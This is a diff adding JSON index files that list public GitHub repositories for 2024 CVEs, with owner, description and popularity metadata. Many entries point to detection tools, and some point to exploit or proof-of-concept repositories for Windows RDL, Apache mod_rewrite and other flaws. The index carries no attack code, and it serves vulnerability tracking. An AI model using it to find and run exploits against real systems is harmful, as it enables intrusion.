b/2024/CVE-2024-38077.json @@ -0,0 +1,416 @@ +[ + { + "id": 840101981, + "name": "CVE-2024-38077-POC", + "full_name": "SecStarBot\/CVE-2024-38077-POC", + "owner": { + "login": "SecStarBot", + "id": 132645723, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/132645723?v=4", + "html_url": "https:\/\/github.com\/SecStarBot", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SecStarBot\/CVE-2024-38077-POC", + "description": null, + "fork": false, + "created_at": "2024-08-09T01:24:59Z", + "updated_at": "2024-12-15T09:56:35Z", + "pushed_at": "2024-08-09T01:19:08Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 223, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 223, + "watchers": 7, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 840155778, + "name": "CVE-2024-38077", + "full_name": "qi4L\/CVE-2024-38077", + "owner": { + "login": "qi4L", + "id": 75202638, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75202638?v=4", + "html_url": "https:\/\/github.com\/qi4L", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/qi4L\/CVE-2024-38077", + "description": "RDL的堆溢出导致的RCE", + "fork": false, + "created_at": "2024-08-09T05:00:44Z", + "updated_at": "2024-12-11T02:09:40Z", + "pushed_at": "2024-08-14T04:43:05Z", + "stargazers_count": 210, + "watchers_count": 210, + "has_discussions": false, + "forks_count": 86, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 86, + "watchers": 210, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 840205980, + "name": "CVE-2024-38077", + "full_name": "Sec-Link\/CVE-2024-38077", + "owner": { + "login": "Sec-Link", + "id": 175936829, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/175936829?v=4", + "html_url": "https:\/\/github.com\/Sec-Link", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sec-Link\/CVE-2024-38077", + "description": null, + "fork": false, + "created_at": "2024-08-09T07:37:49Z", + "updated_at": "2024-08-09T17:58:46Z", + "pushed_at": "2024-08-09T07:48:07Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 840208671, + "name": "RDL-detect", + "full_name": "murphysecurity\/RDL-detect", + "owner": { + "login": "murphysecurity", + "id": 101661127, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101661127?v=4", + "html_url": "https:\/\/github.com\/murphysecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/murphysecurity\/RDL-detect", + "description": "远程探测 remote desktop licensing 服务开放情况,用于 CVE-2024-38077 漏洞快速排查", + "fork": false, + "created_at": "2024-08-09T07:45:25Z", + "updated_at": "2024-10-28T17:52:40Z", + "pushed_at": "2024-08-09T08:06:19Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 12, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 840208910, + "name": "CVE-2024-38077", + "full_name": "Wlibang\/CVE-2024-38077", + "owner": { + "login": "Wlibang", + "id": 18629232, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18629232?v=4", + "html_url": "https:\/\/github.com\/Wlibang", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Wlibang\/CVE-2024-38077", + "description": "CVE-2024-38077,本仓库仅用作备份,", + "fork": false, + "created_at": "2024-08-09T07:46:09Z", + "updated_at": "2024-12-28T12:45:06Z", + "pushed_at": "2024-08-09T07:45:58Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 840510667, + "name": "CVE-2024-38077-check", + "full_name": "psl-b\/CVE-2024-38077-check", + "owner": { + "login": "psl-b", + "id": 109031584, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/109031584?v=4", + "html_url": "https:\/\/github.com\/psl-b", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/psl-b\/CVE-2024-38077-check", + "description": null, + "fork": false, + "created_at": "2024-08-09T22:01:46Z", + "updated_at": "2024-08-14T08:21:43Z", + "pushed_at": "2024-08-14T08:21:40Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 840545497, + "name": "CVE-2024-38077-RDLCheck", + "full_name": "zhuxi1965\/CVE-2024-38077-RDLCheck", + "owner": { + "login": "zhuxi1965", + "id": 29396844, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29396844?v=4", + "html_url": "https:\/\/github.com\/zhuxi1965", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zhuxi1965\/CVE-2024-38077-RDLCheck", + "description": "检测RDL服务是否运行,快速排查受影响资产", + "fork": false, + "created_at": "2024-08-10T01:10:06Z", + "updated_at": "2024-10-23T00:13:08Z", + "pushed_at": "2024-08-10T02:19:43Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 840609471, + "name": "CVE-2024-38077-notes", + "full_name": "lworld0x00\/CVE-2024-38077-notes", + "owner": { + "login": "lworld0x00", + "id": 9474721, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9474721?v=4", + "html_url": "https:\/\/github.com\/lworld0x00", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lworld0x00\/CVE-2024-38077-notes", + "description": null, + "fork": false, + "created_at": "2024-08-10T06:31:04Z", + "updated_at": "2024-08-10T06:31:08Z", + "pushed_at": "2024-08-10T06:31:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 840708179, + "name": "CVE-2024-38077-check", + "full_name": "atlassion\/CVE-2024-38077-check", + "owner": { + "login": "atlassion", + "id": 49542929, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49542929?v=4", + "html_url": "https:\/\/github.com\/atlassion", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/atlassion\/CVE-2024-38077-check", + "description": "基于135端口检测目标是否存在CVE-2024-38077漏洞", + "fork": false, + "created_at": "2024-08-10T12:49:51Z", + "updated_at": "2024-10-28T17:52:41Z", + "pushed_at": "2024-08-10T09:48:38Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 842828344, + "name": "fyne-gui", + "full_name": "BBD-YZZ\/fyne-gui", + "owner": { + "login": "BBD-YZZ", + "id": 132546612, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/132546612?v=4", + "html_url": "https:\/\/github.com\/BBD-YZZ", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BBD-YZZ\/fyne-gui", + "description": "CVE-2024-38077,仅支持扫描测试~", + "fork": false, + "created_at": "2024-08-15T07:14:00Z", + "updated_at": "2024-12-07T10:29:42Z", + "pushed_at": "2024-08-15T08:33:08Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 846450999, + "name": "check_38077", + "full_name": "Destiny0991\/check_38077", + "owner": { + "login": "Destiny0991", + "id": 63272016, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63272016?v=4", + "html_url": "https:\/\/github.com\/Destiny0991", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Destiny0991\/check_38077", + "description": "Windows远程桌面授权服务CVE-2024-38077检测工具", + "fork": false, + "created_at": "2024-08-23T08:32:40Z", + "updated_at": "2024-09-28T14:47:30Z", + "pushed_at": "2024-08-23T08:48:19Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 869931882, + "name": "CVE-2024-38077", + "full_name": "mrmtwoj\/CVE-2024-38077", + "owner": { + "login": "mrmtwoj", + "id": 22832463, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22832463?v=4", + "html_url": "https:\/\/github.com\/mrmtwoj", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mrmtwoj\/CVE-2024-38077", + "description": "CVE-2024-38077: Remote Code Execution Vulnerability in Windows Remote Desktop Licensing Service", + "fork": false, + "created_at": "2024-10-09T06:39:21Z", + "updated_at": "2025-01-07T15:58:46Z", + "pushed_at": "2024-10-09T06:42:25Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-38077", + "cve-2024-38077poc", + "licensing-service", + "poc", + "rce", + "rce-exploit", + "remote-code", + "remote-code-execution", + "vulnerability", + "windows-remote-desktop" + ], + "visibility": "public", + "forks": 1, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 884867852, + "name": "CVE-2024-38077", + "full_name": "amfg145\/CVE-2024-38077", + "owner": { + "login": "amfg145", + "id": 16266637, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16266637?v=4", + "html_url": "https:\/\/github.com\/amfg145", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/amfg145\/CVE-2024-38077", + "description": "CVE-2024-38077 private for 10 hands", + "fork": false, + "created_at": "2024-11-07T14:31:42Z", + "updated_at": "2024-11-07T14:39:01Z", + "pushed_at": "2024-11-07T14:38:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-38080.json b/2024/CVE-2024-38080.json new file mode 100644 index 0000000000..ff23edfd79 --- /dev/null +++ b/2024/CVE-2024-38080.json @@ -0,0 +1,33 @@ +[ + { + "id": 850642925, + "name": "CVE-2024-38080", + "full_name": "pwndorei\/CVE-2024-38080", + "owner": { + "login": "pwndorei", + "id": 96749184, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96749184?v=4", + "html_url": "https:\/\/github.com\/pwndorei", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pwndorei\/CVE-2024-38080", + "description": "poc code for CVE-2024-38080", + "fork": false, + "created_at": "2024-09-01T11:25:22Z", + "updated_at": "2024-12-09T07:04:48Z", + "pushed_at": "2024-09-01T11:35:25Z", + "stargazers_count": 29, + "watchers_count": 29, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 29, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-38100.json b/2024/CVE-2024-38100.json new file mode 100644 index 0000000000..aa2f4d72ce --- /dev/null +++ b/2024/CVE-2024-38100.json @@ -0,0 +1,33 @@ +[ + { + "id": 838985906, + "name": "CVE-2024-38100-RCE-POC", + "full_name": "Florian-Hoth\/CVE-2024-38100-RCE-POC", + "owner": { + "login": "Florian-Hoth", + "id": 177672507, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/177672507?v=4", + "html_url": "https:\/\/github.com\/Florian-Hoth", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Florian-Hoth\/CVE-2024-38100-RCE-POC", + "description": "CVE-2024-38100 Windows Leaked Wallpaper Escelation to RCE vulnerability", + "fork": false, + "created_at": "2024-08-06T18:26:50Z", + "updated_at": "2024-10-25T09:41:56Z", + "pushed_at": "2024-08-06T18:29:09Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-38124.json b/2024/CVE-2024-38124.json new file mode 100644 index 0000000000..04ebc64a25 --- /dev/null +++ b/2024/CVE-2024-38124.json @@ -0,0 +1,33 @@ +[ + { + "id": 878525695, + "name": "Detailed-Analysis-and-Mitigation-Strategies-for-CVE-2024-38124-and-CVE-2024-43468", + "full_name": "tadash10\/Detailed-Analysis-and-Mitigation-Strategies-for-CVE-2024-38124-and-CVE-2024-43468", + "owner": { + "login": "tadash10", + "id": 126980610, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/126980610?v=4", + "html_url": "https:\/\/github.com\/tadash10", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tadash10\/Detailed-Analysis-and-Mitigation-Strategies-for-CVE-2024-38124-and-CVE-2024-43468", + "description": null, + "fork": false, + "created_at": "2024-10-25T14:53:12Z", + "updated_at": "2024-11-07T03:49:52Z", + "pushed_at": "2024-11-07T03:49:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-38127.json b/2024/CVE-2024-38127.json new file mode 100644 index 0000000000..48d35dcb22 --- /dev/null +++ b/2024/CVE-2024-38127.json @@ -0,0 +1,33 @@ +[ + { + "id": 857638218, + "name": "CVE-2024-38127", + "full_name": "pwndorei\/CVE-2024-38127", + "owner": { + "login": "pwndorei", + "id": 96749184, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96749184?v=4", + "html_url": "https:\/\/github.com\/pwndorei", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pwndorei\/CVE-2024-38127", + "description": null, + "fork": false, + "created_at": "2024-09-15T07:38:44Z", + "updated_at": "2024-11-20T16:31:04Z", + "pushed_at": "2024-09-15T07:39:43Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-38144.json b/2024/CVE-2024-38144.json new file mode 100644 index 0000000000..74eb6ec892 --- /dev/null +++ b/2024/CVE-2024-38144.json @@ -0,0 +1,33 @@ +[ + { + "id": 864791204, + "name": "CVE-2024-38144", + "full_name": "Dor00tkit\/CVE-2024-38144", + "owner": { + "login": "Dor00tkit", + "id": 47893732, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47893732?v=4", + "html_url": "https:\/\/github.com\/Dor00tkit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Dor00tkit\/CVE-2024-38144", + "description": "CVE-2024-38144 - DoS PoC", + "fork": false, + "created_at": "2024-09-29T07:04:58Z", + "updated_at": "2024-12-14T14:30:39Z", + "pushed_at": "2024-09-29T07:13:34Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-38189.json b/2024/CVE-2024-38189.json new file mode 100644 index 0000000000..12804ba123 --- /dev/null +++ b/2024/CVE-2024-38189.json @@ -0,0 +1,33 @@ +[ + { + "id": 845024796, + "name": "CVE-2024-38189", + "full_name": "vx7z\/CVE-2024-38189", + "owner": { + "login": "vx7z", + "id": 171666083, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/171666083?v=4", + "html_url": "https:\/\/github.com\/vx7z", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vx7z\/CVE-2024-38189", + "description": null, + "fork": false, + "created_at": "2024-08-20T12:41:57Z", + "updated_at": "2024-12-25T03:23:30Z", + "pushed_at": "2024-08-20T15:36:45Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-38193.json b/2024/CVE-2024-38193.json new file mode 100644 index 0000000000..6a19bc447b --- /dev/null +++ b/2024/CVE-2024-38193.json @@ -0,0 +1,33 @@ +[ + { + "id": 897795595, + "name": "CVE-2024-38193-Nephster", + "full_name": "killvxk\/CVE-2024-38193-Nephster", + "owner": { + "login": "killvxk", + "id": 309424, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/309424?v=4", + "html_url": "https:\/\/github.com\/killvxk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/killvxk\/CVE-2024-38193-Nephster", + "description": null, + "fork": false, + "created_at": "2024-12-03T08:56:59Z", + "updated_at": "2025-01-04T03:15:45Z", + "pushed_at": "2024-11-18T23:48:31Z", + "stargazers_count": 48, + "watchers_count": 48, + "has_discussions": false, + "forks_count": 23, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 23, + "watchers": 48, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-38200.json b/2024/CVE-2024-38200.json new file mode 100644 index 0000000000..167fee4dd6 --- /dev/null +++ b/2024/CVE-2024-38200.json @@ -0,0 +1,33 @@ +[ + { + "id": 862544939, + "name": "CVE-2024-38200", + "full_name": "passtheticket\/CVE-2024-38200", + "owner": { + "login": "passtheticket", + "id": 76125965, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76125965?v=4", + "html_url": "https:\/\/github.com\/passtheticket", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/passtheticket\/CVE-2024-38200", + "description": "CVE-2024-38200 & CVE-2024-43609 - Microsoft Office NTLMv2 Disclosure Vulnerability", + "fork": false, + "created_at": "2024-09-24T19:24:55Z", + "updated_at": "2025-01-04T04:17:28Z", + "pushed_at": "2024-12-09T22:58:22Z", + "stargazers_count": 136, + "watchers_count": 136, + "has_discussions": false, + "forks_count": 27, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 27, + "watchers": 136, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-38366.json b/2024/CVE-2024-38366.json new file mode 100644 index 0000000000..097631bcf3 --- /dev/null +++ b/2024/CVE-2024-38366.json @@ -0,0 +1,36 @@ +[ + { + "id": 821403467, + "name": "CocoaPods-RCE_CVE-2024-38366", + "full_name": "ReeFSpeK\/CocoaPods-RCE_CVE-2024-38366", + "owner": { + "login": "ReeFSpeK", + "id": 24816171, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24816171?v=4", + "html_url": "https:\/\/github.com\/ReeFSpeK", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ReeFSpeK\/CocoaPods-RCE_CVE-2024-38366", + "description": "CocoaPods RCE Vulnerability CVE-2024-38366", + "fork": false, + "created_at": "2024-06-28T13:11:28Z", + "updated_at": "2024-08-21T02:55:10Z", + "pushed_at": "2024-07-01T12:28:04Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cocoapods", + "cve-2024-38366" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-38396.json b/2024/CVE-2024-38396.json new file mode 100644 index 0000000000..3b0e829ba3 --- /dev/null +++ b/2024/CVE-2024-38396.json @@ -0,0 +1,33 @@ +[ + { + "id": 815829677, + "name": "poc-cve-2024-38396", + "full_name": "vin01\/poc-cve-2024-38396", + "owner": { + "login": "vin01", + "id": 30344579, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30344579?v=4", + "html_url": "https:\/\/github.com\/vin01", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vin01\/poc-cve-2024-38396", + "description": "PoC for iTerm2 CVEs CVE-2024-38396 and CVE-2024-38395 which allow code execution", + "fork": false, + "created_at": "2024-06-16T09:43:46Z", + "updated_at": "2024-11-11T03:07:31Z", + "pushed_at": "2024-06-16T09:51:05Z", + "stargazers_count": 20, + "watchers_count": 20, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 20, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-38472.json b/2024/CVE-2024-38472.json new file mode 100644 index 0000000000..125954b1c0 --- /dev/null +++ b/2024/CVE-2024-38472.json @@ -0,0 +1,75 @@ +[ + { + "id": 837656120, + "name": "CVE-2024-38472", + "full_name": "Abdurahmon3236\/CVE-2024-38472", + "owner": { + "login": "Abdurahmon3236", + "id": 76862934, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76862934?v=4", + "html_url": "https:\/\/github.com\/Abdurahmon3236", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Abdurahmon3236\/CVE-2024-38472", + "description": null, + "fork": false, + "created_at": "2024-08-03T16:08:28Z", + "updated_at": "2024-08-29T13:31:15Z", + "pushed_at": "2024-08-03T19:32:37Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 868234685, + "name": "apache-vulnerability-testing", + "full_name": "mrmtwoj\/apache-vulnerability-testing", + "owner": { + "login": "mrmtwoj", + "id": 22832463, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22832463?v=4", + "html_url": "https:\/\/github.com\/mrmtwoj", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mrmtwoj\/apache-vulnerability-testing", + "description": "Apache HTTP Server Vulnerability Testing Tool | PoC for CVE-2024-38472 , CVE-2024-39573 , CVE-2024-38477 , CVE-2024-38476 , CVE-2024-38475 , CVE-2024-38474 , CVE-2024-38473 , CVE-2023-38709", + "fork": false, + "created_at": "2024-10-05T20:32:45Z", + "updated_at": "2025-01-06T06:20:23Z", + "pushed_at": "2024-10-05T20:37:02Z", + "stargazers_count": 64, + "watchers_count": 64, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apache", + "apache2", + "cve-2023-3870", + "cve-2024-38472", + "cve-2024-38473", + "cve-2024-38474", + "cve-2024-38475", + "cve-2024-38476", + "cve-2024-38477", + "cve-2024-39573" + ], + "visibility": "public", + "forks": 12, + "watchers": 64, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-38473.json b/2024/CVE-2024-38473.json new file mode 100644 index 0000000000..e73ac7ee86 --- /dev/null +++ b/2024/CVE-2024-38473.json @@ -0,0 +1,64 @@ +[ + { + "id": 837366074, + "name": "CVE-2024-38473", + "full_name": "Abdurahmon3236\/CVE-2024-38473", + "owner": { + "login": "Abdurahmon3236", + "id": 76862934, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76862934?v=4", + "html_url": "https:\/\/github.com\/Abdurahmon3236", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Abdurahmon3236\/CVE-2024-38473", + "description": null, + "fork": false, + "created_at": "2024-08-02T19:57:52Z", + "updated_at": "2024-10-29T00:41:05Z", + "pushed_at": "2024-08-02T20:01:15Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 846595537, + "name": "CVE-2024-38473-Nuclei-Template", + "full_name": "juanschallibaum\/CVE-2024-38473-Nuclei-Template", + "owner": { + "login": "juanschallibaum", + "id": 16741330, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16741330?v=4", + "html_url": "https:\/\/github.com\/juanschallibaum", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/juanschallibaum\/CVE-2024-38473-Nuclei-Template", + "description": "Nuclei template to detect Apache servers vulnerable to CVE-2024-38473", + "fork": false, + "created_at": "2024-08-23T14:39:31Z", + "updated_at": "2024-12-22T21:45:53Z", + "pushed_at": "2024-08-24T22:42:42Z", + "stargazers_count": 27, + "watchers_count": 27, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 27, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-38475.json b/2024/CVE-2024-38475.json new file mode 100644 index 0000000000..a91d04ca4d --- /dev/null +++ b/2024/CVE-2024-38475.json @@ -0,0 +1,64 @@ +[ + { + "id": 844097919, + "name": "CVE-2024-38475", + "full_name": "p0in7s\/CVE-2024-38475", + "owner": { + "login": "p0in7s", + "id": 33754111, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33754111?v=4", + "html_url": "https:\/\/github.com\/p0in7s", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/p0in7s\/CVE-2024-38475", + "description": null, + "fork": false, + "created_at": "2024-08-18T11:30:50Z", + "updated_at": "2024-12-06T07:11:01Z", + "pushed_at": "2024-08-18T12:27:30Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 902313749, + "name": "CVE-2024-38475", + "full_name": "soltanali0\/CVE-2024-38475", + "owner": { + "login": "soltanali0", + "id": 87374678, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87374678?v=4", + "html_url": "https:\/\/github.com\/soltanali0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/soltanali0\/CVE-2024-38475", + "description": "exploit CVE-2024-38475(mod_rewrite weakness with filesystem path matching)", + "fork": false, + "created_at": "2024-12-12T10:23:32Z", + "updated_at": "2024-12-12T10:28:30Z", + "pushed_at": "2024-12-12T10:28:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-38526.json b/2024/CVE-2024-38526.json new file mode 100644 index 0000000000..f0873b6954 --- /dev/null +++ b/2024/CVE-2024-38526.json @@ -0,0 +1,33 @@ +[ + { + "id": 852927724, + "name": "pollypull", + "full_name": "putget\/pollypull", + "owner": { + "login": "putget", + "id": 180568046, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/180568046?v=4", + "html_url": "https:\/\/github.com\/putget", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/putget\/pollypull", + "description": "CVE-2024-38526 - Polyfill Scanner", + "fork": false, + "created_at": "2024-09-05T17:09:50Z", + "updated_at": "2024-09-05T19:28:09Z", + "pushed_at": "2024-09-05T19:12:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-38537.json b/2024/CVE-2024-38537.json new file mode 100644 index 0000000000..a815b8dfa5 --- /dev/null +++ b/2024/CVE-2024-38537.json @@ -0,0 +1,33 @@ +[ + { + "id": 825357927, + "name": "Detect_polyfill_CVE-2024-38537-", + "full_name": "Havoc10-sw\/Detect_polyfill_CVE-2024-38537-", + "owner": { + 